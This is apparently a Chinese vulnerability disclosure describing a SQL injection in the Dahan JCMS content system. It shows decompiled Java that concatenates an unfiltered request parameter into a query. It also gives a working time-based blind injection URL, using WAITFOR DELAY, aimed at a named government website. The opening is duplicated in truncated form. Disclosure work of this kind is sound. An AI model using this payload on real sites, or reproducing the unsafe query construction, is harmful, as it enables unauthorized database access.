### 简要描述: 大汉jcms 注入漏洞 ### 详细说明: jcms.blf.user.CatalogBlf.class ``` public boolean doDelete(String strId) { boolean flag = false; String strSql = "SELECT i_id FROM wap_cataloginfo WHERE i_parentid IN(" + strId + ") OR i_id IN(" + strId + ")";//这里的strid没过滤 String[][] arrAnswer = Manager.doQuery(this.strAppID, strSql); if (arrAnswer != null) { StringBuffer sbId = new StringBuffer(arrAnswer.length * 2); for (int i = 0; i < arrAnswer.length; i++) { sbId.append(arrAnswer[i][0]); sbId.append(","); } ``` 调用文件 m_5_d/opr_wap_col.jsp ``` }else if("D".equals(strBillStatus)) { boolean flag=false; String strid = Convert.getParameter(request,"strid"); StringBuffer sbScript = new StringBuffer(); flag = catalogblf.doDelete(strid);//妥妥的注入漏洞 if(flag)/ { String [] arrid = strid.split(","); for(int i=0;i<arrid.length;i++) ``` ### 漏洞证明: 打开www.sihong.gov.cn/jcms/m_5_d/opr_wap_col.jsp?strid=122222222&fn_billstatus=D 返回时间正常 打开http://www.sihong.gov.cn/jcms/m_5_d/opr_wap_col.jsp?strid=122222222);WAITFOR...
### 简要描述: 大汉jcms 注入漏洞 ### 详细说明: jcms.blf.user.CatalogBlf.class ``` public boolean doDelete(String strId) { boolean flag = false; String strSql = "SELECT i_id FROM wap_cataloginfo WHERE i_parentid IN(" + strId + ") OR i_id IN(" + strId + ")";//这里的strid没过滤 String[][] arrAnswer = Manager.doQuery(this.strAppID, strSql); if (arrAnswer != null) { StringBuffer sbId = new StringBuffer(arrAnswer.length * 2); for (int i = 0; i < arrAnswer.length; i++) { sbId.append(arrAnswer[i][0]); sbId.append(","); } ``` 调用文件 m_5_d/opr_wap_col.jsp ``` }else if("D".equals(strBillStatus)) { boolean flag=false; String strid = Convert.getParameter(request,"strid"); StringBuffer sbScript = new StringBuffer(); flag = catalogblf.doDelete(strid);//妥妥的注入漏洞 if(flag)/ { String [] arrid = strid.split(","); for(int i=0;i<arrid.length;i++) ``` ### 漏洞证明: 打开www.sihong.gov.cn/jcms/m_5_d/opr_wap_col.jsp?strid=122222222&fn_billstatus=D 返回时间正常 打开http://www.sihong.gov.cn/jcms/m_5_d/opr_wap_col.jsp?strid=122222222);WAITFOR DELAY '0:0:5'--&fn_billstatus=D 延时5秒左右 标准的延时注入 [<img src="https://images.seebug.org/upload/201405/22151402a1075ca7b930eadad55981d2a869ad14.png" alt="dahan.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/22151402a1075ca7b930eadad55981d2a869ad14.png)